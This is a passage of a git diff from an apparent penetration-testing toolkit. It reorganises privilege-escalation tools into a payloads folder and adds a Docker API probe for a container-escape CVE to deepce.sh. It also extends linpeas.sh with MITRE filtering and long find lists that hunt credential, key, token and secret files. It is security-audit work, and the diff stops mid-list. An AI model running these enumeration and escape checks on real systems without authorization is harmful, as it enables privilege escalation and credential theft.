diff --git a/__init__.py b/__init__.py index 00a032e..e69de29 100644 --- a/__init__.py +++ b/__init__.py @@ -1,12 +0,0 @@ -import os -import sys - -__doc__ = __doc__ or "" -__all__ = [ - "util", "fileserver", "xss_handler", "rev_shell", - "xp_cmdshell", "dnsserver", "sqli", "smtpserver", - "upload_file", "pcap_file_extract" -] - -inc_dir = os.path.dirname(os.path.realpath(__file__)) -sys.path.append(inc_dir) diff --git a/LinEnum.sh b/payloads/linux/LinEnum.sh similarity index 100% rename from LinEnum.sh rename to payloads/linux/LinEnum.sh diff --git a/cdk64 b/payloads/linux/cdk64 similarity index 100% rename from cdk64 rename to payloads/linux/cdk64 diff --git a/chisel b/payloads/linux/chisel similarity index 56% rename from chisel rename to payloads/linux/chisel index 1a0c453..beb175a 100755 Binary files a/chisel and b/payloads/linux/chisel differ diff --git a/chisel64 b/payloads/linux/chisel64 similarity index 57% rename from chisel64 rename to payloads/linux/chisel64 index 44e7bf5..830440a 100755 Binary files a/chisel64 and b/payloads/linux/chisel64 differ diff --git a/deepce.sh b/payloads/linux/deepce.sh similarity index 95% rename from deepce.sh rename to payloads/linux/deepce.sh index e8e42f0..0b82acd 100755 --- a/deepce.sh +++ b/payloads/linux/deepce.sh @@ -125,6 +125,7 @@ TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be p TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to login as root with a blank password, if we have command execution in the container we can become root using su root" TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs" TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary" +TIP_CVE_2025_9074="Docker Desktop versions between 4.25 to 4.44.2 on Windows and MacOS are vulnerable to a container escape via a malicious image. See https://github.com/PtechAmanja/CVE-2025-9074-Docker-Desktop-Container-Escape" TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host." @@ -378,7 +379,7 @@ userCheck() { groups=$(groups| sed "s/\($DANGEROUS_GROUPS\)/${LG}${EX}&${NC}${DG}/g") printStatus "$groups" "None" - if ! [ $isUserRoot ]; then + if ! [ "$isUserRoot" ]; then printQuestion "Sudo ...................." if [ -x "$(command -v sudo)" ]; then if sudo -n -l 2>/dev/null; then @@ -631,7 +632,7 @@ containerPrivileges() { fi } -containerExploits() { +containerExploitAlpine() { # If we are on an alpine linux disto check for CVE–2019–5021 if [ -f "/etc/alpine-release" ]; then alpineVersion=$(cat /etc/alpine-release) @@ -648,6 +649,62 @@ containerExploits() { fi } +containerExploitAPI() { + # Check if docker api is exposed (including CVE-2025-9074) + api_available="0" + api_host="" + api_hosts="192.168.65.7:2375 172.17.0.1:2375" + + printQuestion "Docker API exposed ......" + + if [ -x "$(command -v curl)" ] || [ -x "$(command -v wget)" ]; then + for host in $api_hosts; do + if [ -x "$(command -v curl)" ]; then + if curl -s --connect-timeout 1 "http://$host/version" >/dev/null 2>&1; then + api_available="1" + api_host="$host" + break + fi + else + if wget -O - "http://$host/version" --connect-timeout=1 --tries=1 -q >/dev/null 2>&1; then + api_available="1" + api_host="$host" + break + fi + fi + done + + if [ "$api_available" = "0" ]; then + printNo + return + fi + + printSuccess "Yes ($api_host)" + printQuestion "└── CVE-2025-9074 ......." + + if [ -x "$(command -v curl)" ]; then + if curl -s --connect-timeout 1 "http://$api_host/containers/json" >/dev/null 2>&1; then + printYesEx + printTip "$TIP_CVE_2025_9074" + else + printNo + fi + elif wget -O - "http://$api_host/containers/json" --connect-timeout=1 --tries=1 -q >/dev/null 2>&1; then + printYesEx + printTip "$TIP_CVE_2025_9074" + else + printNo + fi + else + printError "Unknown (curl/wget not installed)" + fi +} + +containerExploits() { + containerExploitAlpine + containerExploitAPI +} + enumerateContainers() { printSection "Enumerating Containers" diff --git a/linpeas.sh b/payloads/linux/linpeas.sh similarity index 56% rename from linpeas.sh rename to payloads/linux/linpeas.sh index 2f1dd11..682c8b5 100644 --- a/linpeas.sh +++ b/payloads/linux/linpeas.sh @@ -49,6 +49,7 @@ DISCOVERY="" PORTS="" QUIET="" CHECKS="system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex" +MITRE_FILTER="" SEARCH_IN_FOLDER="" ROOT_FOLDER="/" WAIT="" @@ -61,14 +62,14 @@ REGEXES="" PORT_FORWARD="" NOT_CHECK_EXTERNAL_HOSTNAME="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" -[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 -[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 -[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 +[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #If THREADS is not a number, put number 2 +[ "$THREADS" -lt 1 ] 2>/dev/null && THREADS="2" #If THREADS is 0 or negative, put number 2 (avoids division-by-zero in eval_bckgrd) HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${GREEN} Checks: ${YELLOW} -a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks. ${YELLOW} -o${BLUE} Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex). Select a comma separated list. + ${YELLOW} -T${BLUE} Only execute checks matching the specified MITRE ATT&CK technique(s).$DG Ex: -T T1057,T1082$BLUE ${YELLOW} -s${BLUE} Stealth & faster (don't check some time consuming checks) ${YELLOW} -e${BLUE} Perform extra enumeration ${YELLOW} -r${BLUE} Enable Regexes (this can take from some mins to hours) @@ -91,8 +92,9 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW} -L${BLUE} Force linpeas execution ${YELLOW} -M${BLUE} Force macpeas execution ${YELLOW} -q${BLUE} Do not show banner - ${YELLOW} -N${BLUE} Do not use colours$NC" -while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do + ${YELLOW} -N${BLUE} Do not use colours + ${YELLOW} -z ${BLUE} Set number of threads for background checks (default: auto-detected CPU count, fallback: 2; must be >= 1)$NC" +while getopts ":h?asd:p:i:P:qo:T:LMwNDterf:F:z:" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";EXTRA_CHECKS="1";; @@ -104,6 +106,7 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do n) NOT_CHECK_EXTERNAL_HOSTNAME="1";; q) QUIET=1;; o) CHECKS=$OPTARG;; + T) MITRE_FILTER=$OPTARG;; L) MACPEAS="";; M) MACPEAS="1";; w) WAIT=1;; @@ -120,6 +123,9 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do REGEXES="1"; CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";; F) PORT_FORWARD=$OPTARG;; + z) if [ "$OPTARG" -eq "$OPTARG" ] 2>/dev/null && [ "$OPTARG" -ge 1 ] 2>/dev/null; then THREADS=$OPTARG; else echo "WARNING: -z requires an integer >= 1, ignoring." >&2; fi;; + :) echo "ERROR: -$OPTARG requires an argument (e.g. -T T1082,T1552)" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;; + *) echo "ERROR: Unknown option -$OPTARG" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;; esac done if [ "$MACPEAS" ]; then SCRIPTNAME="MacPEAS"; else SCRIPTNAME="LinPEAS"; fi @@ -179,7 +185,7 @@ print_title(){ title_len=$(echo $title | wc -c) max_title_len=80 rest_len=$((($max_title_len - $title_len) / 2)) - printf ${BLUE} + printf "%s" "${BLUE}" for i in $(seq 1 $rest_len); do printf " "; done printf "╔" for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; @@ -189,14 +195,36 @@ print_title(){ printf "╣ $GREEN${title}${BLUE} ╠" for i in $(seq 1 $rest_len); do printf "═"; done echo "" - printf ${BLUE} + printf "%s" "${BLUE}" for i in $(seq 1 $rest_len); do printf " "; done printf "╚" for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; printf "╝" - printf $NC + printf "%s" "${NC}" echo "" } +check_mitre_filter(){ + # $1 = comma-separated MITRE technique IDs for this check (e.g. "T1082,T1548.003") + # Returns 0 (run the check) when no filter is active OR when at least one ID matches. + # Parent filters match child techniques (e.g. T1552 matches T1552.001), + # but a child filter must not match a parent-only tag. + # Uses pure parameter-expansion loops — no subprocess forks, POSIX-compliant. + [ -z "$MITRE_FILTER" ] && return 0 + _mitre_tags_left="$1," + while [ -n "$_mitre_tags_left" ]; do + _mitre_tag="${_mitre_tags_left%%,*}" + _mitre_tags_left="${_mitre_tags_left#*,}" + _mitre_base=${_mitre_tag%%.*} + _mitre_filters_left="$MITRE_FILTER," + while [ -n "$_mitre_filters_left" ]; do + _mitre_filter="${_mitre_filters_left%%,*}" + _mitre_filters_left="${_mitre_filters_left#*,}" + [ "$_mitre_filter" = "$_mitre_tag" ] && return 0 + [ "$_mitre_filter" = "$_mitre_base" ] && return 0 + done + done + return 1 +} print_2title(){ if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) @@ -207,10 +235,18 @@ print_2title(){ fi START_T2_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" + if [ -n "$2" ]; then + printf ${BLUE}"╔══════════╣ $GREEN$1 ${DG}($2)\n"$NC #There are 10 "═" + else + printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" + fi } print_3title(){ - printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" + if [ -n "$2" ]; then + printf ${BLUE}"══╣ $GREEN$1 ${DG}($2)\n"$NC #There are 2 "═" + else + printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" + fi } print_3title_no_nl(){ printf "\033[2K\r" @@ -298,6 +334,7 @@ print_support () { ${GREEN}/---------------------------------------------------------------------------------\\ | ${BLUE}Do you like PEASS?${GREEN} | |---------------------------------------------------------------------------------| + | ${YELLOW}Linux PE & Hardening${GREEN} : ${RED}https://hacktricks-training.com/courses/lhe/${GREEN} | | ${YELLOW}Learn Cloud Hacking${GREEN} : ${RED}https://training.hacktricks.xyz ${GREEN} | | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@hacktricks_live${GREEN} | | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} | @@ -316,9 +353,10 @@ echo "" printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC" echo "" printf ${BLUE}"Linux Privesc Checklist: ${YELLOW}https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html\n"$NC +printf ${BLUE}"Best Linux PE & Hardening course: ${YELLOW}https://hacktricks-training.com/courses/lhe/\n"$NC echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," -echo " RED: You should take a look to it" | sed "s,RED,${SED_RED}," +echo " RED: You should take a look into it" | sed "s,RED,${SED_RED}," echo " LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN}," echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," @@ -694,8 +732,8 @@ if [ "$SEARCH_IN_FOLDER" ]; then printf $GREEN"Caching directories "$NC CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name \"mysql\" -o -name \"bind\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"kube-proxy\" -o -name \"kubelet\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"pam.d\" -o -name \"system-connections\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"system.d\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \"kubernetes\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"ssh*config\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"sess_*\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"msal_token_cache.bin\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"*knockd*\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"exports\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"agent*\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"*jenkins\" -o -name \"zabbix\" -o -name \"varnish\" -o -name \"ErrorRecords\" -o -name \"kubelet\" -o -name \"Google Cloud Directory Sync\" -o -name \"gh\" -o -name \"session.d\" -o -name \"logstash\" -o -name \"bind\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"kube-proxy\" -o -name \"services\" -o -name \"system-connections\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"system-services\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \"system.d\" -o -name \"kubernetes\" -o -name \"neo4j\" -o -name \"system-local.d\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \"pam.d\" -o -name \".kube*\" -o -name \".vnc\" -o -name \"wpa_supplicant\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \".cloudflared\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"exports\" -o -name \"mysqld.cnf\" -o -name \"setupinfo.bak\" -o -name \"tomcat-users.xml\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"*knockd*\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"ssh-agent.sock\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"agent.*\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"sess_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"ssh*config\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name 